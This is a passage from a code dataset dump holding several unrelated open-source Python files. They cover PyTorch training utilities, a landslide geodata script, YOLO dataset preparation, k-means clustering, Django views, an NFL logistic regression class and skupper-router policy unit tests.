*args, **kwargs\n )\n for field in fields(data)\n if field.init\n }\n )\n for field in fields(data):\n if not field.init:\n setattr(\n new_data_class,\n field.name,\n copy_data_to_device(\n getattr(data, field.name), device, *args, **kwargs\n ),\n )\n return new_data_class\n elif isinstance(data, _CopyableData):\n return data.to(device, *args, **kwargs)\n return data\n\n\ndef move_optimizer_state_to_device(\n optimizer: torch.optim.Optimizer, device: torch.device\n) -> torch.optim.Optimizer:\n optimizer.state = copy_data_to_device(optimizer.state, device)\n return optimizer\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, device, fmt=\":f\"):\n self.name = name\n self.fmt = fmt\n self.device = device\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self._allow_updates = True\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def synchronize(self):\n assert self._allow_updates, \"Please reset the meter to allow synchronization.\"\n if not is_dist_avail_and_initialized():\n return\n t = torch.tensor(\n [self.sum, self.count], dtype=torch.float64, device=self.device\n )\n dist.barrier()\n dist.all_reduce(t)\n t = t.tolist()\n self.sum = int(t[0])\n self.count = t[1]\n self.avg = self.sum / self.count if self.count > 0 else np.nan\n self._allow_updates = False\n\n def __str__(self):\n fmtstr = \"{name} {val\" + self.fmt + \"} ({avg\" + self.fmt + \"})\"\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n logging.info(\"\\t\".join(entries))\n\n def synchronize(self):\n for meter in self.meters:\n meter.synchronize()\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = \"{:\" + str(num_digits) + \"d}\"\n return \"[\" + fmt + \"/\" + fmt.format(num_batches) + \"]\"\n\n\ndef get_resume_checkpoint(checkpoint_save_dir):\n\n if not g_pathmgr.isdir(checkpoint_save_dir):\n return None\n ckpt_file = os.path.join(checkpoint_save_dir, \"checkpoint.pt\")\n if not g_pathmgr.isfile(ckpt_file):\n return None\n\n return ckpt_file\n\n\n# TODO: Move this to a separate logging file.\n\n\ndef setup_logging(name, output_dir=None, rank=0):\n \"\"\"\n Setup various logging streams: stdout and file handlers.\n For file handlers, we only setup for the master gpu.\n \"\"\"\n # get the filename if we want to log to the file as well\n log_filename = None\n if output_dir:\n makedir(output_dir)\n if rank == 0:\n log_filename = f\"{output_dir}/log.txt\"\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # create formatter\n FORMAT = \"%(levelname)s %(asctime)s %(filename)s:%(lineno)4d: %(message)s\"\n formatter = logging.Formatter(FORMAT)\n\n # clean up any pre-existing handlers\n for h in logger.handlers:\n logger.removeHandler(h)\n logger.root.handlers = []\n\n # setup the console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n # we log to file as well if user wants\n if log_filename and rank == 0:\n file_handler = logging.StreamHandler(_cached_log_stream(log_filename))\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n logging.root = logger\n\n\n# cache the opened file object, so that different calls to `setup_logger`\n# with the same file name can safely write to the same file.\n@functools.lru_cache(maxsize=None)\ndef _cached_log_stream(filename):\n # we tune the buffering value so that the logs are updated\n # frequently.\n log_buffer_kb = 10 * 1024 # 10KB\n io = g_pathmgr.open(filename, mode=\"a\", buffering=log_buffer_kb)\n atexit.register(io.close)\n return io\n\n\ndef shutdown_logging():\n \"\"\"\n After training is done, we ensure to shut down all the logger streams.\n \"\"\"\n logging.info(\"Shutting down loggers...\")\n handlers = logging.root.handlers\n for handler in handlers:\n handler.close()\n","repo_name":"facebookresearch/omnivore","sub_path":"omnivision/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":525,"dataset":"github-code","pt":"32"} +{"seq_id":"24588082881","text":"import os\nimport rasterio\nimport pandas as pd\nimport geopandas as gp\nfrom matplotlib import pyplot as plt\nfrom functools import reduce\nfrom geopandas import GeoDataFrame\nfrom shapely.geometry import Polygon, Point\nfrom rasterio.features import shapes\n\nclass Slidding:\n\n\texport_rain = pd.DataFrame()\n\tdeslizamientos = pd.DataFrame()\t\n\tmunicipios = pd.DataFrame()\n\tfolder = '../Datos/CHIRPS/'\n\trasters = []\n\n\tdef __init__(self, folder = '../Datos/CHIRPS/') -> None:\n\t\tself.folder = folder\n\n\tdef get_date(self, tiff_path):\n\t\ttiff_name = tiff_path.split('/')[-1]\n\t\tdate = '-'.join(tiff_name.split('.')[:-1])\n\t\treturn date\n\n\tdef open_tiff(self, src, date, mask = None):\n\t\tresults = []\n\t\tfor s, v in shapes(src.read(), mask=mask, transform=src.meta['transform']):\n\t\t\tdata = {\n\t\t\t\t'properties': {date: v}, \n\t\t\t\t'geometry': Polygon(s['coordinates'][0]).centroid\n\t\t\t}\n\t\t\tresults.append(data)\n\t\treturn results\n\n\tdef get_raster(self, path):\n\t\tsrc = rasterio.open(path)\n\t\tcrs = src.read_crs()\n\t\tdate = self.get_date(path)\n\t\ttiff = self.open_tiff(src, date)\n\t\tsrc.close()\n\t\traster = GeoDataFrame.from_features(tiff, crs=crs)\n\t\traster['geometry'] = raster['geometry'].to_crs(crs)\n\t\treturn raster\n\n\tdef get_rasters(self):\n\t\tfor file in os.listdir(self.folder):\n\t\t\tif file.endswith('.tif'):\n\t\t\t\tpath = os.path.join(self.folder, file)\n\t\t\t\traster = self.get_raster(path)\n\t\t\t\tself.rasters.append(raster)\n\t\treturn self.rasters\n\n\tdef get_municipios(self):\n\t\tself.municipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tself.municipios = self.municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\treturn self.municipios\n\n\tdef run(self):\n\t\tself.get_rasters()\n\t\tself.get_municipios()\n\t\t\n\t\tself.deslizamientos = gp.read_file('procesamiento/INVENTARIO_FINAL_MM.csv')\n\t\tself.deslizamientos.columns = ['movimiento', 'fecha', 'municipio', 'latitud', 'longitud', 'fuente', 'geometry']\n\t\tself.deslizamientos.geometry = self.deslizamientos.apply(lambda row: Point(float(row['longitud']), float(row['latitud'])), axis=1)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[['geometry', 'movimiento', 'fecha', 'fuente']]\n\t\tself.deslizamientos.fecha = pd.to_datetime(self.deslizamientos.fecha, format='%d/%m/%Y')\n\t\tself.deslizamientos.set_crs(epsg=4326, inplace=True)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[self.deslizamientos.fecha >= '2010-01-01']\n\t\t# print(deslizamientos.shape)\n\t\t# deslizamientos.head()\n\n\t\treturn self.deslizamientos\n\n\tdef export_to_geoJson(self):\n\t\t\n\t\tmunicipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tmunicipios = municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\tprint(municipios.shape)\n\t\tmunicipios.head()\n\n\t\t# Obtener los municipios que contienen deslizamientos\n\t\tgeodata = gp.sjoin(self.deslizamientos, municipios, how='left', predicate='intersects')\n\t\tgeodata = geodata[geodata['index_right'].notna()]\n\t\tgeodata = geodata.drop(columns=['index_right'])\n\t\t# print(geodata.shape)\n\t\t# Exportar a GeoJSON\n\t\tgeodata.to_file('deslizamientos.geojson', driver='GeoJSON')\n\t\t# geodata.head()","repo_name":"karinstefa/VA_project","sub_path":"Slidding.py","file_name":"Slidding.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38387809784","text":"\n\"\"\"\nNoting down steps followed:\n\n1. The ultralytics weights file - made a copy in drive and moved it to the required folder in drive itself\n2. Locally create the folder structure as mentioned here https://github.com/theschoolofai/YoloV3\n3. Created custom.data and custom.names locally inside customdata folder\n4. Changed Images/ to \"data/customdata/images\" in train.txt\n5. Changed .txt to .jpg in train.txt\n6. In train.txt, file named \"Aimgg_005.jpg\" is a typo - so rename it to Aimg_005.jpg\n7. In test.txt, file names ImageYolo.jpg does not exists, so remove it\n8. In test.txt, file names M/img_010 does not exists - so rename it to Mimg_010\n\n\"\"\"\n\nimport os\nimport shutil\nimport zipfile as zp\n\nfrom PIL import Image\n\n\n\n\nZOHEB_ZIPFILE_PATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/YoloV3_Dataset.zip\"\nCUSTOMDATA_FOLDERPATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/images_structured/customdata\"\n\nARRANGED_IMGFOLDER = CUSTOMDATA_FOLDERPATH + \"/images\"\nARRANGED_LBLFOLDER = CUSTOMDATA_FOLDERPATH + \"/labels\"\n\n\n# Code for checking if any value in label texts is above 1.000\n\n\n\n\n# Code for checking if file exists:\n\n\nwith open(\"./data/customdata/train.txt\",\"r\") as infl:\n for k in infl:\n k = k.strip()\n if not os.path.exists( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") ):\n print( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") )\n\n\n\n\ndef make_filepath_list(imgfolder, lblfolder):\n image_files = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n label_files = [ os.path.splitext(l)[0] for l in os.listdir(lblfolder) ]\n\n image_names = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n\n \n\n\n\ndef rearrange_images_labels_and_zip(zipfile_path, customdata_folderpath):\n\n extract_path, extract_folder = os.path.split(zipfile_path)\n extract_folder = extract_folder.replace(\".zip\",\"\")\n\n # Extract contents from zip\n with zp.ZipFile(zipfile_path, \"r\") as zip:\n zip.extractall()\n\n # Define relevant file paths\n imgfolder = extract_folder + \"/Images\"\n lblfolder = extract_folder + \"/Labels\"\n train_file_list = extract_folder + \"/train.txt\"\n test_file_list = extract_folder + \"/test.txt\"\n name_list = extract_folder + \"/classes.txt\"\n\n dest_imgfolder = ARRANGED_IMGFOLDER\n dest_lblfolder = customdata_folderpath + \"/labels\"\n dest_train_file_list = customdata_folderpath + \"/train.txt\"\n dest_test_file_list = customdata_folderpath + \"/test.txt\"\n dest_name_list = customdata_folderpath + \"/custom.names\"\n \n\n shutil.copytree(imgfolder, dest_imgfolder, dirs_exist_ok=True)\n shutil.copytree(lblfolder, dest_lblfolder, dirs_exist_ok=True)\n shutil.copy(train_file_list, dest_train_file_list)\n shutil.copy(test_file_list, dest_test_file_list)\n shutil.copy(name_list, dest_name_list)\n\n\n\ndef rename_image_exts(arranged_imgfolder):\n\n image_filenames = os.listdir(arranged_imgfolder)\n\n for fl in image_filenames:\n fil, ex = os.path.splitext(fl)\n if ex != \".jpg\":\n print(fl)\n\n if ex == \".png\":\n png_to_jpg(image_filepath=os.path.join(arranged_imgfolder, fl))\n else:\n os.rename( os.path.join(arranged_imgfolder, fl), \n os.path.join(arranged_imgfolder, fil+\".jpg\") )\n\n\n\ndef png_to_jpg(image_filepath):\n im = Image.open(image_filepath)\n rgb_im = im.convert(\"RGB\")\n rgb_im.save(image_filepath.replace(\".png\",\".jpg\"))\n os.remove(image_filepath)\n\n\ndef clip_to_ones_in_labels():\n pass\n\n\n\nif __name__ == \"__main__\":\n rearrange_images_labels_and_zip(zipfile_path=ZOHEB_ZIPFILE_PATH, \n customdata_folderpath=CUSTOMDATA_FOLDERPATH)\n# rename_image_exts(arranged_imgfolder=ARRANGED_IMGFOLDER)\n\n\n\n\n","repo_name":"sairamsubramaniam/tsai_projects","sub_path":"assignment13_yolo/yolo_ppe/cleanup_prepare.py","file_name":"cleanup_prepare.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11919794095","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n\ndef kmean_cluster(df,clusters):\n\n kmeans_df = df[['principal component 1', 'principal component 2']].copy()\n kmeans = KMeans(init=\"k-means++\", n_clusters=clusters).fit(kmeans_df)\n labels = kmeans.labels_\n X_dist = (kmeans.transform(kmeans_df))\n\n distance = []\n\n for inner_list in X_dist:\n distance.append((min(inner_list)))\n\n kmeans_df['PRED'] = labels\n kmeans_df['test_name'] = df['test_name'].values\n kmeans_df['distance'] = distance\n\n grouped_df = kmeans_df.groupby(\"PRED\")\n grouped_lists = grouped_df[\"test_name\"].apply(list)\n grouped_lists = grouped_lists.reset_index()\n df_result = grouped_lists.explode('test_name')\n grouped_lists.explode('test_name').to_csv(\"clusters.csv\")\n\n return df_result,kmeans\n\ndef plot_kmeans(df, kmeans):\n\n centroids = kmeans.cluster_centers_\n plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)\n plt.scatter(df['principal component 1'], df['principal component 2'], c= kmeans.labels_.astype(float), s=50, alpha=0.5)\n for i, label in enumerate(df['test_name']):\n plt.annotate(i, (df['principal component 1'][i], df['principal component 2'][i]))\n plt.xlabel(\"Component 1\")\n plt.ylabel(\"Component 2\")\n plt.grid()\n plt.show()\n\n\ndef main():\n\n FILE = \"pca.csv\"\n clusters = 2\n\n if len(sys.argv) > 1:\n FILE = sys.argv[1]\n clusters = int(sys.argv[2])\n\n df = pd.read_csv(FILE)\n df_result = kmean_cluster(df,clusters)\n print(df_result)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"VictorRodriguez/doctorado","sub_path":"detector/clustering/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40537644334","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.template import loader\nfrom .models import Student, Division\nfrom django.http import HttpResponse\nfrom .models import Student, Division, Teacher, Subject\nfrom .forms import studentForm, teacherform, divisionform, subjectform\n\n\ndef create_student(request):\n form = studentForm()\n if request.method == 'POST':\n form = studentForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('

    Saved the student

    ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/create.html', context)\n\n\ndef create_teacher(request):\n form = teacherform()\n if request.method == 'POST':\n form = teacherform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/teacher.html', context)\n\n\ndef create_division(request):\n form = divisionform()\n if request.method == 'POST':\n form = divisionform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/division.html', context)\n\n\ndef create_subject(request):\n form = subjectform()\n if request.method == 'POST':\n form = subjectform(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('

    Saved...

    ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/subject.html', context)\n\n\ndef student(request):\n obj = Student.objects.all()\n context = {\n 'obj': obj\n }\n return render(request, 'user/form.html', context)\n\n\ndef get_all_students(request):\n query = request.GET.get('q')\n print(query)\n results = Student.objects.filter(name=query)\n student_in_div = Student.objects.filter(division__name='3A')\n print(student_in_div)\n for result in results:\n stud_sub = Student.objects.filter(division__teacher__subject__name=result.division.teacher.subject.name)\n print(stud_sub)\n context = {\n 'results': results\n }\n return render(request, 'user/get.html', context)\n","repo_name":"Jishin4477/django-app","sub_path":"studentapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8463367459","text":"'''\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.update(R)\r\n>>> print H\r\nset(['a', 'c', 'e', 'H', 'k', 'n', 'r', 'R'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.intersection_update(R)\r\n>>> print H\r\nset(['a', 'k'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'r'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.symmetric_difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'n', 'r', 'R'])\r\n\r\n'''\r\n\r\nA = set()\r\n\r\nn = int(input('Enter Length of set A: '))\r\n\r\nfor i in range(n):\r\n inpt = int(input('Enter number in Set A: '))\r\n A.add(inpt)\r\n\r\nprint(A)\r\nN = int(input('Enter number of operations: '))\r\n\r\nfor op in range(N):\r\n S = set()\r\n oper = input('Enter name of operation {}: '.format(op+1))\r\n m = int(input('Enter Length of Set S: '))\r\n\r\n for i in range(m):\r\n inpt = int(input('Enter number in Set S: '))\r\n S.add(inpt)\r\n\r\n if oper == 'update':\r\n A.update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'intersection_update':\r\n A.intersection_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'difference_update':\r\n A.difference_update(S)\r\n print('A:')\r\n print(A)\r\n elif oper == 'symmetric_difference_update':\r\n A.symmetric_difference_update(S)\r\n print('A:')\r\n print(A)\r\n","repo_name":"Raizadaaditya/Atom_Programs","sub_path":"set_update_operations.py","file_name":"set_update_operations.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28865893039","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\n\n# import numpy as np\n\n\nclass LinearModels:\n def __init__(self, verbose=False):\n self.verbose = verbose\n\n def define_clf(self, clf_type=\"lr\"):\n \"\"\"\n Define a logisitic regression model.\n\n Parameters\n ----------\n clf_type : str, optional\n _description_, by default \"lr\"\n\n Returns\n -------\n _type_\n _description_\n \"\"\"\n if clf_type == \"lr\":\n clf_lr = LogisticRegression()\n return clf_lr\n\n def logistic_regr(self, design_matrix, response):\n \"\"\"\n Fit a logistic regression model to data.\n\n Parameters\n ----------\n design_matrix : DataFrame\n _description_\n response : Vector\n the outcome of interest\n\n Returns\n -------\n Logistic Regression (sklearn)\n _description_\n \"\"\"\n clf_lr = self.define_clf()\n clf_lr.fit(X=design_matrix, y=response)\n return clf_lr\n\n def get_wgts(self, model_object):\n \"\"\"\n Generate bias and weights (coefficients) from a linear model.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n\n Returns\n -------\n DataFrame\n _description_\n \"\"\"\n # intercept = model_object.intercept_\n bias = model_object.intercept_\n wgts = model_object.coef_\n bias_tbl = pd.DataFrame(bias, columns=[\"bias\"])\n wgts_tbl = pd.DataFrame(wgts, columns=model_object.feature_names_in_)\n\n return pd.concat([bias_tbl, wgts_tbl], axis=1)\n\n def make_random_sample_test(self, data_object, nbr_sample=2):\n tmp_sample = data_object.sample(n=nbr_sample).reset_index(drop=True)\n # tmp_sample_answer = tmp_sample[\"home_team_wins\"]\n return tmp_sample\n\n def make_inference(self, model_object, data_object):\n \"\"\"\n Produce estimates for data.\n\n Parameters\n ----------\n model_object : Logistic Regression (sklearn)\n _description_\n data_object : DataFrame or array-like object\n _description_\n\n Returns\n -------\n Dict\n Contains the following:\n 1. predicted class --> array\n 2. predicted probabilities --> array\n 3. standard deviation of the predicted probabilities --> array\n 4. absolute difference of the predicted probabilities --> array\n\n Notes\n -----\n Calculating and returning the standard deviation and absolute difference of the\n predicted probabilities allows for further underestanding of the models decision\n boundary.\n \"\"\"\n pred_cls = model_object.predict(data_object)\n pred_probs = model_object.predict_proba(data_object)\n\n std_diff = np.std(pred_probs, axis=1)\n abs_diff = np.abs(np.diff(pred_probs, axis=1))\n abs_diff = abs_diff.reshape(std_diff.shape)\n\n infer_dt = {\n \"pred_cls\": pred_cls,\n \"pred_probs\": pred_probs,\n \"std_diff\": std_diff,\n \"abs_diff\": abs_diff,\n }\n\n return infer_dt\n","repo_name":"jonathanharmitage/nflMatchupPredictor","sub_path":"nflMatchupPredictor/Models/LinearModels.py","file_name":"LinearModels.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19898455238","text":"import json\nfrom typing import TYPE_CHECKING, Any\n\nfrom skupper_router_internal.policy.policy_util import HostAddr, is_ipv6_enabled\nfrom skupper_router_internal.policy.policy_util import HostStruct\nfrom skupper_router_internal.policy.policy_util import PolicyError\nfrom skupper_router_internal.policy.policy_util import PolicyAppConnectionMgr\nfrom skupper_router_internal.policy.policy_local import PolicyLocal\n\nfrom system_test import unittest\nfrom system_test import TestCase, main_module\n\nif TYPE_CHECKING:\n from skupper_router_internal.policy.policy_local import AppStats\n\n\nclass PolicyHostAddrTest(TestCase):\n\n def expect_deny(self, badhostname, msg):\n denied = False\n try:\n xxx = HostStruct(badhostname)\n except PolicyError:\n denied = True\n self.assertTrue(denied, (\"%s\" % msg))\n\n def check_hostaddr_match(self, tHostAddr, tString, expectOk=True):\n # check that the string is a match for the addr\n # check that the internal struct version matches, too\n ha = HostStruct(tString)\n if expectOk:\n self.assertTrue(tHostAddr.match_str(tString))\n self.assertTrue(tHostAddr.match_bin(ha))\n else:\n self.assertFalse(tHostAddr.match_str(tString))\n self.assertFalse(tHostAddr.match_bin(ha))\n\n def test_policy_hostaddr_ipv4(self):\n # Create simple host and range\n aaa = HostAddr(\"192.168.1.1\")\n bbb = HostAddr(\"1.1.1.1,1.1.1.255\")\n # Verify host and range\n self.check_hostaddr_match(aaa, \"192.168.1.1\")\n self.check_hostaddr_match(aaa, \"1.1.1.1\", False)\n self.check_hostaddr_match(aaa, \"192.168.1.2\", False)\n self.check_hostaddr_match(bbb, \"1.1.1.1\")\n self.check_hostaddr_match(bbb, \"1.1.1.254\")\n self.check_hostaddr_match(bbb, \"1.1.1.0\", False)\n self.check_hostaddr_match(bbb, \"1.1.2.0\", False)\n\n def test_policy_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n # Create simple host and range\n aaa = HostAddr(\"::1\")\n bbb = HostAddr(\"::1,::ffff\")\n ccc = HostAddr(\"ffff::0,ffff:ffff::0\")\n # Verify host and range\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"::2\", False)\n self.check_hostaddr_match(aaa, \"ffff:ffff::0\", False)\n self.check_hostaddr_match(bbb, \"::1\")\n self.check_hostaddr_match(bbb, \"::fffe\")\n self.check_hostaddr_match(bbb, \"::1:0\", False)\n self.check_hostaddr_match(bbb, \"ffff::0\", False)\n self.check_hostaddr_match(ccc, \"ffff::1\")\n self.check_hostaddr_match(ccc, \"ffff:fffe:ffff:ffff::ffff\")\n self.check_hostaddr_match(ccc, \"ffff:ffff::1\", False)\n self.check_hostaddr_match(ccc, \"ffff:ffff:ffff:ffff::ffff\", False)\n\n def test_policy_hostaddr_ipv4_wildcard(self):\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"0.0.0.0\")\n self.check_hostaddr_match(aaa, \"127.0.0.1\")\n self.check_hostaddr_match(aaa, \"255.254.253.252\")\n\n def test_policy_hostaddr_ipv6_wildcard(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n aaa = HostAddr(\"*\")\n self.check_hostaddr_match(aaa, \"::0\")\n self.check_hostaddr_match(aaa, \"::1\")\n self.check_hostaddr_match(aaa, \"ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\")\n\n def test_policy_malformed_hostaddr_ipv4(self):\n self.expect_deny(\"0.0.0.0.0\", \"Name or service not known\")\n self.expect_deny(\"1.1.1.1,2.2.2.2,3.3.3.3\", \"arg count\")\n self.expect_deny(\"9.9.9.9,8.8.8.8\", \"a > b\")\n\n def test_policy_malformed_hostaddr_ipv6(self):\n if not is_ipv6_enabled():\n self.skipTest(\"System IPv6 support is not available\")\n self.expect_deny(\"1::2::3\", \"Name or service not known\")\n self.expect_deny(\"::1,::2,::3\", \"arg count\")\n self.expect_deny(\"0:ff:0,0:fe:ffff:ffff::0\", \"a > b\")\n\n\nclass QpidDispatch:\n def qd_dispatch_policy_c_counts_alloc(self):\n return 100\n\n def qd_dispatch_policy_c_counts_refresh(self, cstats, entitymap):\n pass\n\n\nclass MockAgent:\n def __init__(self) -> None:\n self.qd = QpidDispatch()\n\n def add_implementation(self, entity: 'AppStats', cfg_obj_name: str) -> None:\n pass\n\n\nclass MockPolicyManager:\n def __init__(self):\n self.agent = MockAgent()\n self.logs = []\n\n def log_debug(self, text):\n print(\"DEBUG: %s\" % text)\n self.logs.append(text)\n\n def log_info(self, text):\n print(\"INFO: %s\" % text)\n self.logs.append(text)\n\n def log_trace(self, text):\n print(\"TRACE: %s\" % text)\n self.logs.append(text)\n\n def log_error(self, text):\n print(\"ERROR: %s\" % text)\n self.logs.append(text)\n\n def log_warning(self, text):\n print(\"WARNING: %s\" % text)\n self.logs.append(text)\n\n def get_agent(self):\n return self.agent\n\n\nclass PolicyFile(TestCase):\n\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_policy1_test_zeke_ok(self):\n p1 = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 1)\n self.assertEqual(p1, 'test')\n upolicy = {}\n self.assertTrue(\n PolicyFile.policy.lookup_settings('photoserver', p1, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n def test_policy1_test_zeke_bad_IP(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '10.18.0.1', 'photoserver', \"connid\", 2) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '72.135.2.9', 'photoserver', \"connid\", 3) == '')\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '127.0.0.1', 'photoserver', \"connid\", 4) == '')\n\n def test_policy1_test_zeke_bad_app(self):\n self.assertTrue(\n PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n def test_policy1_test_users_same_permissions(self):\n zname = PolicyFile.policy.lookup_user('zeke', '192.168.100.5', 'photoserver', '192.168.100.5:33333', 6)\n yname = PolicyFile.policy.lookup_user('ynot', '10.48.255.254', 'photoserver', '192.168.100.5:33334', 7)\n self.assertTrue(zname == yname)\n\n def test_policy1_lookup_unknown_application(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('unknown', 'doesntmatter', upolicy)\n )\n\n def test_policy1_lookup_unknown_usergroup(self):\n upolicy = {}\n self.assertFalse(\n PolicyFile.policy.lookup_settings('photoserver', 'unknown', upolicy)\n )\n\n\nclass PolicyFileApplicationFallback(TestCase):\n manager: Any = MockPolicyManager()\n policy = PolicyLocal(manager)\n policy.test_load_config()\n\n def test_bad_app_fallback(self):\n # Show that with no fallback the user cannot connect\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n # Enable the fallback defaultVhost and show the same user can now connect\n self.policy.set_default_vhost('photoserver')\n settingsname = self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5)\n self.assertTrue(settingsname == 'test')\n\n # Show that the fallback settings are returned\n upolicy = {}\n self.assertTrue(\n self.policy.lookup_settings('phony*app*name', settingsname, upolicy)\n )\n self.assertTrue(upolicy['maxFrameSize'] == 444444)\n self.assertTrue(upolicy['maxMessageSize'] == 444444)\n self.assertTrue(upolicy['maxSessionWindow'] == 444444)\n self.assertTrue(upolicy['maxSessions'] == 4)\n self.assertTrue(upolicy['maxSenders'] == 44)\n self.assertTrue(upolicy['maxReceivers'] == 44)\n self.assertTrue(upolicy['allowAnonymousSender'])\n self.assertTrue(upolicy['allowDynamicSource'])\n self.assertTrue(upolicy['targets'] == 'a,private,')\n self.assertTrue(upolicy['sources'] == 'a,private,')\n\n # Disable fallback and show failure again\n self.policy.set_default_vhost('')\n self.assertTrue(\n self.policy.lookup_user('zeke', '192.168.100.5', 'galleria', \"connid\", 5) == '')\n\n\nclass PolicyAppConnectionMgrTests(TestCase):\n\n def test_policy_app_conn_mgr_fail_by_total(self):\n stats = PolicyAppConnectionMgr(1, 2, 2)\n diags = []\n self.assertTrue(stats.can_connect('10.10.10.10:10000', 'chuck', '10.10.10.10', diags, None, None))\n self.assertFalse(stats.can_connect('10.10.10.10:10001', 'chuck', '10.10.10.10', diags, None, None))\n self.assertTrue(len(diags) == 1)\n self.assertIn('application connection limit', diags[0])\n\n def test_policy_app_conn_mgr_fail_by_user(self):\n stats = PolicyAppConnectionMgr(3, 